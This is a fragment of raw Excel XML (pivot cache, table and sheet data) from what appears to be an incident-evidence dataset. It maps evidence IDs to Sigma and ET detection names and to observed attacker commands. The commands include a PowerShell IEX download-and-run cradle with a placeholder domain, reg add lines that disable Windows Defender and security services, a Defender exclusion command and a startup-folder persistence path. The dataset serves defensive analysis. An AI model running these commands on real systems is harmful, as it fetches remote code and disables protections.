    <s v="90b63c33-2b97-4631-a011-ceb0f47b77c3: Suspicious Execution From GUID Like Folder Names"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="336"/>
    <s v="certutil-pid"/>
    <x v="11"/>
    <s v="19b08b1c-861d-4e75-a1ef-ea0c1baf202b: Suspicious Download Via Certutil.EXE"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="337"/>
    <m/>
    <x v="11"/>
    <s v="d059842b-6b9d-4ed1-b5c3-5b89143c6ede: File Download Via Bitsadmin"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="338"/>
    <s v="rclone-pid"/>
    <x v="11"/>
    <s v="e37db05d-d1f9-49c8-b464-cee1a4b11638: PUA - Rclone Execution"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="339"/>
    <m/>
    <x v="11"/>
    <s v="7090adee-82e2-4269-bd59-80691e7c6338: Console CodePage Lookup Via CHCP"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="340"/>
    <m/>
    <x v="11"/>
    <s v="d5601f8c-b26f-4ab0-9035-69e11a8d4ad2: CobaltStrike Named Pipe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="341"/>
    <m/>
    <x v="11"/>
    <s v="c8557060-9221-4448-8794-96320e6f3e74: Windows PowerShell User Agent"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="342"/>
    <m/>
    <x v="11"/>
    <s v="1edff897-9146-48d2-9066-52e8d8f80a2f: Suspicious Invoke-WebRequest Execution With DirectIP"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="343"/>
    <m/>
    <x v="11"/>
    <s v="0ef56343-059e-4cb6-adc1-4c3c967c5e46: Suspicious Execution of Systeminfo"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="344"/>
    <s v="nltest-pid"/>
    <x v="11"/>
    <s v="903076ff-f442-475a-b667-4f246bcc203b: Nltest.EXE Execution"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="345"/>
    <s v="nltest-pid"/>
    <x v="11"/>
    <s v="5cc90652-4cbd-4241-aa3b-4b462fa5a248: Potential Recon Activity Via Nltest.EXE"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="346"/>
    <m/>
    <x v="11"/>
    <s v="624f1f33-ee38-4bbe-9f4a-088014e0c26b: IcedID Malware Execution Patterns"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="347"/>
    <m/>
    <x v="12"/>
    <s v="ET INFO Executable Download from dotted-quad Host_x000a_ETPRO HUNTING Windows BITS UA Retrieving EXE_x000a_ET HUNTING Suspicious BITS EXE DL From Dotted Quad_x000a_ET POLICY PE EXE or DLL Windows file download HTTP_x000a_ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response_x000a_ETPRO HUNTING Windows BITS UA Retrieving EXE M2_x000a_ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request_x000a_ETPRO MALWARE Likely Evil Certutil Retrieving EXE_x000a_ThreatFox payload delivery (domain - confidence level: 100%)_x000a_ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile_x000a_ThreatFox Cobalt Strike botnet C2 traffic (ip:port - confidence level: 80%)_x000a_ET INFO Packed Executable Download_x000a_ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1_x000a_ET MALWARE Cobalt Strike Beacon Observed_x000a_ET MALWARE Win32/IcedID Requesting Encoded Binary M4_x000a_ET MALWARE Win32/IcedID Request Cookie_x000a_ET SCAN Potential SSH Scan OUTBOUND "/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="348"/>
    <s v="pshell-pid"/>
    <x v="13"/>
    <s v="C:\ Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c .\45.ps1"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="349"/>
    <s v="pshell-pid"/>
    <x v="13"/>
    <s v="powershell IEX(new-object net.webclient).downloadstring('http://&lt;domain&gt;/mdNPS/vic64.ps1')"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="350"/>
    <s v="registry-pid"/>
    <x v="13"/>
    <s v="HKLM\SYSTEM\CurrentControlSet\Control\Lsa"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="351"/>
    <m/>
    <x v="14"/>
    <s v="suspicious access to lsass service"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="352"/>
    <m/>
    <x v="14"/>
    <s v="suspicious 'DumpLsass' behavior was blocked"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="353"/>
    <m/>
    <x v="14"/>
    <s v="process memory dump"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="354"/>
    <m/>
    <x v="13"/>
    <s v="An active 'RegistryExfil' malware in a command line"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="355"/>
    <s v="netscan-pid"/>
    <x v="13"/>
    <s v="netscan"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="356"/>
    <m/>
    <x v="13"/>
    <s v="C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sap.bat"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="357"/>
    <s v="pshell-pid"/>
    <x v="13"/>
    <s v="reg add &quot;HKLM\Soltware\Microsoft\Windows Defender\Features&quot; /v &quot;TamperProtection&quot; /t REG_DWORD /d &quot;0&quot; /f"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="358"/>
    <s v="pshell-pid"/>
    <x v="13"/>
    <s v="wmic /namespace:\\root\Microsoft\Windows\Defender PATH MpPreference call Add ExclusionPath"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="359"/>
    <s v="pshell-pid"/>
    <x v="13"/>
    <s v="reg add &quot;HKLM\System\CurrentControlSet\Services\SgrmBroker&quot; /v &quot;Start&quot; /t REG_DWORD /d &quot;4&quot; /f"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="360"/>
    <s v="pshell-pid"/>
    <x v="13"/>
    <s v="reg add &quot;HKLM\System\CurrentControlSet\Services\SecurityHealthService&quot; /v &quot;Start&quot; /t REG_DWORD /d &quot;4&quot; /f"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="361"/>
    <s v="pshell-pid"/>
    <x v="13"/>
    <s v="reg add &quot;HKLM\Soltware\Microsoft\Windows Defender&quot; /v &quot;DisableAntiSpyware&quot; /t REG_DWORD /d &quot;1&quot; /f"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <x v="362"/>
    <s v="pshell-pid"/>
    <x v="13"/>
    <s v="reg add &quot;HKLM\Soltware\Microsoft\Windows Defender&quot; /v &quot;DisableAntiVirus&quot; /t REG_DWORD /d &quot;1&quot; /f"/>
    <m/>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0D0FB3-69F0-F143-A444-51C9B43A1782}" name="PivotTable3"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4" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="6">
    <pivotField dataField="1"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dataField="1" showAll="0"/>
    <pivotField showAll="0">
      <items count="16">
        <item x="2"/>
        <item x="3"/>
        <item x="12"/>
        <item x="4"/>
        <item x="0"/>
        <item x="1"/>
        <item x="7"/>
        <item x="6"/>
        <item x="14"/>
        <item x="5"/>
        <item x="9"/>
        <item x="11"/>
        <item x="10"/>
        <item x="8"/>
        <item x="13"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="11">
        <item x="1"/>
        <item x="5"/>
        <item x="0"/>
        <item x="6"/>
        <item x="2"/>
        <item x="3"/>
        <item x="4"/>
        <item x="7"/>
        <item x="8"/>
        <item x="9"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="5"/>
  </rowFields>
  <rowItems count="11">
    <i>
      <x/>
    </i>
    <i>
      <x v="1"/>
    </i>
    <i>
      <x v="2"/>
    </i>
    <i>
      <x v="3"/>
    </i>
    <i>
      <x v="4"/>
    </i>
    <i>
      <x v="5"/>
    </i>
    <i>
      <x v="6"/>
    </i>
    <i>
      <x v="7"/>
    </i>
    <i>
      <x v="8"/>
    </i>
    <i>
      <x v="9"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="-2"/>
  </colFields>
  <colItems count="2">
    <i>
      <x/>
    </i>
    <i i="1">
      <x v="1"/>
    </i>
  </colItems>
  <dataFields count="2">
    <dataField name="Count of map_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of e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7889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F364" totalsRowShown="0" dataDxfId="6">
  <autoFilter ref="A1:F364" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F364">
    <sortCondition ref="A1:A364"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="4"/>
    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="1"/>
    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_meta"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A5849-2682-F643-8842-EFF560F6FB5C}">
  <dimension ref="A1:F364"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="D357" sqref="D357:D358"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.1640625" customWidth="1"/>
    <col min="2" max="2" width="21.5" customWidth="1"/>
    <col min="3" max="3" width="12.83203125" customWidth="1"/>
    <col min="4" max="4" width="112.5" customWidth="1"/>
    <col min="5" max="5" width="70.33203125" customWidth="1"/>
    <col min="6" max="6" width="145.33203125" customWidth="1"/>
    <col min="7" max="7" width="103.33203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>1</v>
      </c>
      <c r="C1" t="s">
        <v>5</v>
      </c>
      <c r="D1" t="s">
        <v>3</v>
      </c>
      <c r="E1" t="s">
        <v>2</v>
      </c>
      <c r="F1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="2" spans="1:6" ht="153" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>6</v>
      </c>
      <c r="B2" s="1"/>
      <c r="C2" s="1" t="s">
        <v>40</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>7</v>
      </c>
      <c r="E2" s="1"/>
      <c r="F2" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>9</v>
      </c>
      <c r="B3" s="1"/>
      <c r="C3" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>10</v>
      </c>
      <c r="E3" s="1"/>
      <c r="F3" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>274</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>12</v>
      </c>
      <c r="E4" s="1"/>
      <c r="F4" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>13</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>275</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>153</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>14</v>
      </c>
      <c r="E5" s="1"/>
      <c r="F5" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>15</v>
      </c>
      <c r="B6" s="1"/>
      <c r="C6" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>16</v>
      </c>
      <c r="E6" s="1"/>
      <c r="F6" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>17</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>276</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>18</v>
      </c>
      <c r="E7" s="1"/>
      <c r="F7" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B8" s="1"/>
      <c r="C8" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>20</v>
      </c>
      <c r="E8" s="1"/>
      <c r="F8" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>21</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>277</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>22</v>
      </c>
      <c r="E9" s="1"/>
      <c r="F9" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B10" s="1"/>
      <c r="C10" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E10" s="1"/>
      <c r="F10" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="11" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>25</v>
      </c>
      <c r="B11" s="1"/>
      <c r="C11" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>26</v>
      </c>
      <c r="E11" s="1"/>
      <c r="F11" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="12" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>27</v>
      </c>
      <c r="B12" s="1"/>
      <c r="C12" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>28</v>
      </c>
      <c r="E12" s="1"/>
      <c r="F12" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>29</v>
      </c>
      <c r="B13" s="1"/>
      <c r="C13" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E13" s="1"/>
      <c r="F13" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>31</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>278</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>32</v>
      </c>
      <c r="E14" s="1"/>
      <c r="F14" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="15" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>33</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>293</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>34</v>
      </c>
      <c r="E15" s="1"/>
      <c r="F15" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>35</v>
      </c>
      <c r="B16" s="1"/>
      <c r="C16" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E16" s="1"/>
      <c r="F16" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="17" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>37</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>294</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>38</v>
      </c>
      <c r="E17" s="1"/>
      <c r="F17" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="18" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>39</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>292</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>40</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>271</v>
      </c>
      <c r="E18" s="1"/>
      <c r="F18" s="1" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="136" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>159</v>
      </c>
      <c r="B19" s="1"/>
      <c r="C19" s="1" t="s">
        <v>40</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>41</v>
      </c>
      <c r="E19" s="1" t="s">
        <v>42</v>
      </c>
      <c r="F19" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>160</v>
      </c>
      <c r="B20" s="1"/>
      <c r="C20" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E20" s="1"/>
      <c r="F20" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>161</v>
      </c>
      <c r="B21" s="1"/>
      <c r="C21" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>45</v>
      </c>
      <c r="E21" s="1"/>
      <c r="F21" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>162</v>
      </c>
      <c r="B22" s="1"/>
      <c r="C22" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E22" s="1"/>
      <c r="F22" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="102" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>163</v>
      </c>
      <c r="B23" s="1"/>
      <c r="C23" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>47</v>
      </c>
      <c r="E23" s="1"/>
      <c r="F23" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="24" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A24" s="1" t="s">
        <v>164</v>
      </c>
      <c r="B24" s="1"/>
      <c r="C24" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>48</v>
      </c>
      <c r="E24" s="1"/>
      <c r="F24" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="25" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A25" s="1" t="s">
        <v>165</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>288</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D25" s="1" t="s">
        <v>49</v>
      </c>
      <c r="E25" s="1"/>
      <c r="F25" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="26" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A26" s="1" t="s">
        <v>166</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>282</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D26" s="1" t="s">
        <v>50</v>
      </c>
      <c r="E26" s="1"/>
      <c r="F26" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="27" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A27" s="1" t="s">
        <v>167</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>287</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>107</v>
      </c>
      <c r="D27" s="1" t="s">
        <v>51</v>
      </c>
      <c r="E27" s="1"/>
      <c r="F27" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="28" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A28" s="1" t="s">
        <v>168</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>283</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D28" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E28" s="1"/>
      <c r="F28" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="29" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A29" s="1" t="s">
        <v>169</v>
      </c>
      <c r="B29" s="1"/>
      <c r="C29" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D29" s="1" t="s">
        <v>53</v>
      </c>
      <c r="E29" s="1"/>
      <c r="F29" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="30" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A30" s="1" t="s">
        <v>170</v>
      </c>
      <c r="B30" s="1"/>
      <c r="C30" s="1" t="s">
        <v>150</v>
      </c>
      <c r="D30" s="1" t="s">
        <v>54</v>
      </c>
      <c r="E30" s="1"/>
      <c r="F30" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="31" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A31" s="1" t="s">
        <v>171</v>
      </c>
      <c r="B31" s="1"/>
      <c r="C31" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D31" s="1" t="s">
        <v>55</v>
      </c>
      <c r="E31" s="1"/>
      <c r="F31" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="32" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A32" s="1" t="s">
        <v>172</v>
      </c>
      <c r="B32" s="1"/>
      <c r="C32" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D32" s="1" t="s">
        <v>56</v>
      </c>
      <c r="E32" s="1"/>
      <c r="F32" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="33" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A33" s="1" t="s">
        <v>173</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>286</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D33" s="1" t="s">
        <v>57</v>
      </c>
      <c r="E33" s="1"/>
      <c r="F33" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="34" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A34" s="1" t="s">
        <v>174</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>286</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D34" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E34" s="1"/>
      <c r="F34" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="35" spans="1:6" ht="51" x14ac:dyDescent="0.2">
      <c r="A35" s="1" t="s">
        <v>175</v>
      </c>
      <c r="B35" s="1"/>
      <c r="C35" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>59</v>
      </c>
      <c r="E35" s="1"/>
      <c r="F35" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="36" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A36" s="1" t="s">
        <v>176</v>
      </c>
      <c r="B36" s="1"/>
      <c r="C36" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D36" s="1" t="s">
        <v>60</v>
      </c>
      <c r="E36" s="1"/>
      <c r="F36" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="37" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A37" s="1" t="s">
        <v>177</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>284</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>61</v>
      </c>
      <c r="E37" s="1"/>
      <c r="F37" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="38" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A38" s="1" t="s">
        <v>178</v>
      </c>
      <c r="B38" s="1"/>
      <c r="C38" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D38" s="1" t="s">
        <v>62</v>
      </c>
      <c r="E38" s="1"/>
      <c r="F38" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="39" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A39" s="1" t="s">
        <v>179</v>
      </c>
      <c r="B39" s="1"/>
      <c r="C39" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D39" s="1" t="s">
        <v>63</v>
      </c>
      <c r="E39" s="1"/>
      <c r="F39" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="40" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A40" s="1" t="s">
        <v>180</v>
      </c>
      <c r="B40" s="1"/>
      <c r="C40" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D40" s="1" t="s">
        <v>64</v>
      </c>
      <c r="E40" s="1"/>
      <c r="F40" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="41" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A41" s="1" t="s">
        <v>181</v>
      </c>
      <c r="B41" s="1"/>
      <c r="C41" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D41" s="1" t="s">
        <v>65</v>
      </c>
      <c r="E41" s="1"/>
      <c r="F41" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="42" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A42" s="1" t="s">
        <v>182</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>285</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D42" s="1" t="s">
        <v>66</v>
      </c>
      <c r="E42" s="1"/>
      <c r="F42" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="43" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A43" s="1" t="s">
        <v>183</v>
      </c>
      <c r="B43" s="1"/>
      <c r="C43" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D43" s="1" t="s">
        <v>67</v>
      </c>
      <c r="E43" s="1"/>
      <c r="F43" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="44" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A44" s="1" t="s">
        <v>184</v>
      </c>
      <c r="B44" s="1"/>
      <c r="C44" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D44" s="1" t="s">
        <v>68</v>
      </c>
      <c r="E44" s="1"/>
      <c r="F44" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="45" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A45" s="1" t="s">
        <v>185</v>
      </c>
      <c r="B45" s="1"/>
      <c r="C45" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D45" s="1" t="s">
        <v>69</v>
      </c>
      <c r="E45" s="1"/>
      <c r="F45" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="46" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A46" s="1" t="s">
        <v>186</v>
      </c>
      <c r="B46" s="1"/>
      <c r="C46" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D46" s="1" t="s">
        <v>70</v>
      </c>
      <c r="E46" s="1"/>
      <c r="F46" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="47" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A47" s="1" t="s">
        <v>187</v>
      </c>
      <c r="B47" s="1"/>
      <c r="C47" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D47" s="1" t="s">
        <v>71</v>
      </c>
      <c r="E47" s="1"/>
      <c r="F47" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="48" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A48" s="1" t="s">
        <v>188</v>
      </c>
      <c r="B48" s="1"/>
      <c r="C48" s="1" t="s">
        <v>270</v>
      </c>
      <c r="D48" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E48" s="1"/>
      <c r="F48" s="1" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="49" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A49" s="1" t="s">
